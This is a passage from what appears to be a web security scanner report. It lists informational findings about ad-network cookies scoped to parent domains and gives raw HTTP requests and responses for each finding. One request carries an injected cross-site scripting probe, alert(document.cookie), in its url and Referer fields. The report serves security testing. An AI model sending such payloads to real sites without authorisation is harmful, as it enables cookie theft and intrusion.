Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=arn7TwNZaiMt6memCmGwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bWalbfCPvRr5pHFJ2IiiqvUj8gL5UKMojsRtkyGv3iLgZdLhJWNtFwIaQqSDUhJXcolRQQftgBRpZbqFL3j1LmZaRLgOPqeE7bMdTEIGxtZdfM5WI7wWtsmYZaJOJkAibgqRMFJEdwIqaWU9WeZd8ntA03ww6cnyXOZbrqhfFE1rXFZdZb7tIQT1LDwroLnCrSBFdeNZb3ZbqSUdhKTLyZaa4ZcFGHeZbVThMfN8pnAYOeBZbsKVSfraRuvG30PErMalZa5

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=acn9yYr2PKMbuYn3Ycn4F5XpyFRGnTGDP2XlKn4flsYZaThCaY83G72Ttfc5CJViEZdoE1yd1Usq1ZbkfXpBHsFbApGkQGaGqZahSVsP8xUffgA1ZcJVp3fGOk7aFW4RXZdTdir1WbQPysXanCH1StdPbR7GqZauWGq8Y6I9JPro4uHhxESlZbSqZbJPt8EUtHZdhVXqPEBFUuZd4qdrX2qCIkoIyfEZaVUjyXqKZb6MKiReZdmBw1Zc3rThnZaB2yPbObsqku3t2yYFpeArR41kxK4jvH0GX38pfMAcc7tQmrno85a83b4DEKPAUQtQMl5tshRx5ZbGTn6TnNL6Eci6b9WavR62BX5N2WpqNp6pVCEj66XWGv45XZcl03UDwgInTwrFUORinp35JMdrGb; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:27:34 GMT;
Content-Type: text/html
Location: http://ad.yieldmanager.com/pixel?id=473373&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3612
Content-Length: 0
Connection: keep-alive

10.18. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 14:14:39 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90&p=4068932&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aEn51LRZdySO6IUMsYExOjh1oBlrc7bJ8Za02ysiMOWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57np199FZaw0mLWCH3AI5YJ0Wu36N55DyVPRBluxr7Bd5gBBXYkqRUe9UmE3CjxKLRFZcGvULfwumB2EKIn6QgbjSZcpCQcvO7WyZcQFe5mtDTRxdQZcIKWq8vfRhb6rjYSsPAM4QAsdVAed20A8B7YI0bHtTZatU7uo6f2JsWE7JrIZcnCEDooMfNC2sNZavfrtdRR9acdOQurFTy82SWn4nUGHFJMcjNnQ7dfKlmsY

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 14:14:39 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 660

document.write('<IFRAME src="http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36
...[SNIP]...

10.19. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN

Response

10.20. http://ad.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=c653243310000d9|2782903/1009150/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3a9d/17/19e/*/x;234178444;1-0;0;58087481;3454-728/90;40401349/40419136/1;;~sscs=?http:/a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true
Set-Cookie: id=c653243310000d9|2782903/1009150/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 28 Jan 2011 16:41:38 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

10.21. http://ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=c653243310000d9|1033942/1042959/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=300x250;pc=[TPAS_ID];ord=1114886567?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.vw.com
Set-Cookie: id=c653243310000d9|1033942/1042959/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 28 Jan 2011 16:40:24 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

10.22. http://ad.doubleclick.net/jump/N6103.135388.BIZO/B5185769.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/N6103.135388.BIZO/B5185769.6

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=c653243310000d9|3050873/1051395/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N6103.135388.BIZO/B5185769.6;sz=728x90;ord=7630304?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.supercutsfranchise.com
Set-Cookie: id=c653243310000d9|3050873/1051395/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 28 Jan 2011 16:40:37 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

10.23. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
adImpCount=93BCq0WTCVMxF4AWDa_UBzGK2WVGmSebj4padkL3fXlh-L3XcPmT4hHXOQgApIlYCBsZxoRT6EzfAaBOxC9wKX8qYrC9FMnU5Q2wRAYDGypi9OYrtG-b0iAWL5Sg__z6OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirk_GMdu-y1E9O4PMUo2v2JwhEaBrxFtkyt_nkQhj928o37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJw1Kd0O3adRO10CesNfjCJaQrupC4PpJl2uCWF8C-Ug5JonU1AejF4MphQeZeUYshY_OeXGaHeEWZpxqUmyoO4ex_oV54IeDig5WzYLup3TcrrvyCQus6kPDo2a6SDFY3VUvCEsZdhQvkMaGDNXRUK74rP1CqKPcaX2koNpmFe4031p3A6UMJjebe8drcGsyS4Zsrl5itefLEEgtwe41cGh3HscxZqdV3tAgaup_BUiqfohDo4-tul6_WuD8j0eMjBk0vy7k2KCP9mAU3yIXJQsGDwUqNo5bwBfJavyMoCpX2Mtj8-j4P85vtqL-bgk4Jg88QTsvGp_uMnqAhaiuvUqwwwjl5KiXaen7PpuSxadNSx5tYcmc04sL2FZMw7u1ZPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6ZETO-MbYZA0ULyuOeS61QiyzaIjIkAm2O1xn3y2FwP0uPWnCg7Sts-m8PiyghybB3-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lA11f5HvjRM9LIAbnXs0Li7sXDmro6MsrnR0NjzyjJ0TpQgutzeDGCBRPRExuEdlCI6QrupC4PpJl2uCWF8C-Ug4Qr4-ZP_IMKsn4iIvW22r5067axWP77CNDdpZKPWLlS6EqzrlzsjMft3cRcjGnFvlTek5Lj_h7B1Bewly4iRmuVUvCEsZdhQvkMaGDNXRUK1IwqsroZj1oRmZCrinK3xPqzZ3gkHjNDLavV-i2IDmnytv5VAjvqHzGGgVc9TLFt3n4e5tgg6Ff1RgMWUU5h-ufohDo4-tul6_WuD8j0eMjcK-jZlyP6xG2V_Rmz3l2ScGDwUqNo5bwBfJavyMoCpUNbeNuKs3BuRiO6omJfcAAyR5nk0A4EbdYMkjxQX8Hhqwwwjl5KiXaen7PpuSxadOt4qBzD-0ra0lWqOClC2AdPveIf8j2XY661VgXz9vKr9po5kaVd3TDYjljHCv4vLrze8F97qvYfrL-2a4LxLlnvjmctIv6W_2bTZNXeWSbh689PoZZTdQXeDWLQpeFTD3-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukPU0BHKzioTSvOcuG_kdCGnpgcqiBETfVCgh6rOLqPGrWJcu-kcMstt6LYwLOO39vXw6eBg1etFWMwt9pDo4G3TjkMSE2urA6RQdUAWYeoJQpCu6kLg-kmXa4JYXwL5SDjce5WjiPia_4luRal1kY0Ua2L50HxvswuEv77HCRTvK41JwlocRM-1StCCQK60MTBqLSIeNNGU_XCDdEOyfgVlVS8ISxl2FC-QxoYM1dFQrVqtvVzrvJEYFzSRak7dnImakJ6Zxx4MaHG4qowJX52fHOfatzSZzKUl8ueBqzCaawyxPIuWXsEQ-0VWpUhNmBZ-iEOjj626Xr9a4PyPR4yPdkp0kF32F0VrZ-eD50kGIwYPBSo2jlvAF8lq_IygKlXvQQfU6ZavOfoVVJhgWQDUVQfWr6jEufoVuLrgwy8D2rDDCOXkqJdp6fs-m5LFp079CPUiQuMHA6LAYXd57kxI-94h_yPZdjrrVWBfP28qvnT-zGB9Xm2VMe1fLfEIlOjW7jR21XdBj9GT7hPGQI4m-OZy0i_pb_ZtNk1d5ZJuHZA0jg1fLTpYL91q-pX0OtP78DoTX-MltELREBCeeahn1EC3U97yx8tXGz59qajUNpeot5-RPYUMY1qY3KivegYnicFnxFc-4ikme6wD3XHzXEqzQphnl7VhTGqxMDJsQpCu6kLg-kmXa4JYXwL5SDsgJkFWfRpPSyTdtKER-3fcbnCbJPSsHs0iOvX6zYZZ4XS3R0VP0f9ONcHVGJG5kfjUcKVDPX7zKRho6DeqmotVVS8ISxl2FC-QxoYM1dFQrENIylttcubl60fIAlgS379WGImt49pAB5RbCmhGeBVeEsNCVznntZWR3U7tjmpSZiMw4PMfLrYvwIJbxWoTsNZ-iEOjj626Xr9a4PyPR4yMyn697UAeI_iQ8xLHPyiNAwYPBSo2jlvAF8lq_IygKld75wEvezzIZgflpDl6XV7Bz61fwo7QtwGhL9V1Zrp3FrDDCOXkqJdp6fs-m5LFp0xYfxbijCuZYBnVL9kRyFz4-94h_yPZdjrrVWBfP28qvmOFU8nguKqpFLBdwoMdYmADyq9uBrjiMx6VvlWwNe_j33zBfQgc7CEV5jgCDdYtxgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA1ZO48tyrM-ITAlagqmc0qyWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyISYAbn3vt4ljb5jrj3mjbuV6ONoHWtyiE_pNTuBZXnxgi4LrnYI2YdVGKStQre4vEIuC652CNmHVRikrUK3uLxAmtS2Fa_lgnITmIRLj_AJR7yJIda-hMcXPq0_ADWUTce8iSHWvoTHFz6tPwA1lE3HvIkh1r6Exxc-rT8ANZRNz1jBTPQnGgalvM6qx6aEDqwMBGNyQcik-CF3_ES7LaN4Qoi_pxuEDAGD0pSAe0ShbJ44Ix0PS_yRZLx_j2HJpKyeOCMdD0v8kWS8f49hyaSko9jTov_tduoJ79WLRX3x8Jj6CPb9QD2jcY4QbTolZhp6t2QqCDEnVfKSI9Czqb8VkfhIMtBluaWa_TlPV12CVZH4SDLQZbmlmv05T1ddglWR-Egy0GW5pZr9OU9XXYJVkfhIMtBluaWa_TlPV12CZekQLzj8BqHl0xQJeRVWsdCB_o2VuswdXqYMMGNHfG3Qgf6NlbrMHV6mDDBjR3xt0IH-jZW6zB1epgwwY0d8bdCB_o2VuswdXqYMMGNHfG3UUrgidBzdBjh8B5MmfBQqlFK4InQc3QY4fAeTJnwUKpRSuCJ0HN0GOHwHkyZ8FCqWvltIzMqv1Ia8A8-3JcNhcYY5Ax3y_aeD6ynSPnIOKXGGOQMd8v2ng-sp0j5yDilxhjkDHfL9p4PrKdI-cg4pas0VdShRmcr603-icVYa2s; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
fc=4eSwQ3g1tAr0ps2Jsn-_eWoVwDvXeel54vyZXm8QLISGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOemGrp6DlmlaGmQt2qcOx1gg; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
pf=xRx_CDsAoWoco5w3DRjwyiu1jndAIQSkfSH7IRm-hA2JwV9kSIzX4BtZ7vBDkFqiIdgy2Lx6nc2yvIrh5BEVs34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25206694&ahcid=78205&bimpd=21muvIbp10pUTWpgKeYXuBQpi4lGWgXGmwtEktp0bnhlzcEPCmKdzaOiN1w1JuG39EwjnwLbuWY9jCkZnpaQCWMdTXpPOHIA4Z3jWxQxlq4y0vr517NqPsPUS5E3qaEy91D0_KKhuTQf67OuV_F749IlnflTkyMzHOFj90yiivHk_Cifb2ytW8v8q_Ju-6U92ggx_bSQJBFgf_df8ZyZOeIlwU6iDh8JI6jOqp9q_Wu3L84a7I2NobirdMafsG3a4N_1k_LcbI1l_qw0hEgsW7ih2yQWaHy9ifTWvGQp8MHeKeZbcKBEFJ-wvfKan3_Boe6iWHbggg0Ypr7Atghsve1apqwxaDzB0mbr6PDH01f6uHcLMkCy-9027k5Tm6h9eWjcOJtBxwrIpab7eQoB2_vtezeQUtzKlS-ZQl0TjFHJLs4Ovk7WWqSFZMBZz0bEQl2pohKvINvcsARm5gxTHdmyu_XeZQTM0Y5XRGWekIB53lXvcwhi6qGeInxFIoFRfkbJ9D6YlCf5v80FPzVo5ZXIC94vkRX48casGySCH6SZxmuGhwjIl1JUdlPvihaCvfBz5xDsVEqchMpjM7fNhfDYOPZ0JXZ2uZFvjyYJf-F96K7oroatdbmzLY4GaezlgHULOjMY_qhRxKBMycAthKXuC9_2QhUUPMZBRYynaNwC3_JOWKiVz48eoEJe8dgOqRCcEuBcKxtaNJfsYHiQ1JAURjFg_cZiTZL5pFw8O7mjsZQyAQ6kVAwWSib4A4xDzHGAvnK92wWrpVqHjkZPWuoljc-5zAAoOxoBcBgje0LDTAGcK0LbrjjUGkdS7-oV&acp=35600B7D7485C869&rtbacid=55ed4e5e03bf8e5477cfcd0039923902d2e38a03 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sun, 30 Jan 2011 17:37:29 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
